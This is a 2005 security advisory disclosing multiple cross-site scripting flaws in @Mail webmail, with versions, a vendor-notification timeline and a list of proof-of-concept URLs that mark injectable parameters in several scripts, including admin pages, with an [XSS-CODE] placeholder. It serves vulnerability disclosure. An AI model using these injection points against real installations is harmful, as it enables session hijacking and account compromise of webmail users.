############################################# @Mail multiple variable cross-site scripting vendor url:http://www.atmail.com Advisory:http://lostmon.blogspot.com/2005/07/ mail-multiple-variable-cross-site.html vendor notify:yes exploit available: yes ############################################## @Mail is a feature rich Email solution that allows users to access email-resources via the web or a variety of wireless devices. The software incorporates a complete email-server package to manage and host user email at your domain(s) @Mail contains a flaw that allows a remote cross site scripting attack.This flaw exists because the application does not validate multiple variables upon submission to multiple scripts.This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity. ############# versions ############# @Mail 4.03 WebMail for Windows @Mail 4.11 - Linux / FreeBSD / Solaris / HP-UX / OS-X / it is also posible other versions are vulnerable. ################# Timeline ################# Discovered:2-07-2005 vendor notify:27-07-2005 vendor response:28-07-2005 disclosure:28-07-2005 ################## Proof of comcepts ################## For exploit this flaws, need a clientlogin and for exploiting all flaws in /webadmin/ need a admin login. ################### princal.pl ################### http://[victim]/printcal.pl?year=[XSS-CODE]&month=11&type=4 http://[victim]/printcal.pl?year=&month=11&type=4[XSS-CODE] http://[victim]/printcal.pl?type=4[XSS-CODE] ################### task.pl ################### http://[victim]/task.pl?func=todo[XSS-CODE] ################### compose.pl #################### http://[victim]/compose.pl?id=cur/1117452847.H104572P10795. [victim].com%3A2%2C&folder=Sent&cache=&func=reply &type=reply[XSS-CODE] http://[victim]/compose.pl?spellcheck=112253846919856.sc.new &func=spellcheck&HtmlEditor=1&unique=19944&msgtype=r[XSS-CODE] http://[victim]/compose.pl?spellcheck=112253846919856.sc.new &func=spellcheck&HtmlEditor=1&unique=19944[XSS-CODE]&msgtype=r http://[victim]/compose.pl?func=new&To= lala@lala.es&Cc=&Bcc=[XSS-CODE] http://[victim]/compose.pl?func=new&To= lala@lala.es&Cc=[XSS-CODE]&Bcc= http://[victim]/compose.pl?func=new&To= lala@lala.es[XSS-CODE]&Cc=&Bcc= ################### webadmin/filter.pl ################### http://[victim]/webadmin/filter.pl?func= viewmailrelay&Order=IPaddress[XSS-CODE] http://[victim]/webadmin/filter.pl?func=filter &Header=blacklist_from&Type=1[XSS-CODE]&View=1 http://[victim]/webadmin/filter.pl?func=filter &Header=blacklist_from[XSS-CODE]&Type=1&View=1 http://[victim]/webadmin/filter.pl? func=filter&Header=whitelist_from&Type=0&Display=1 &Sort=value[XSS-CODE]&Type=1&View=1 ######################## €nd ########################## Thnx to estrella to be my ligth atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ -- La curiosidad es lo que hace mover la mente....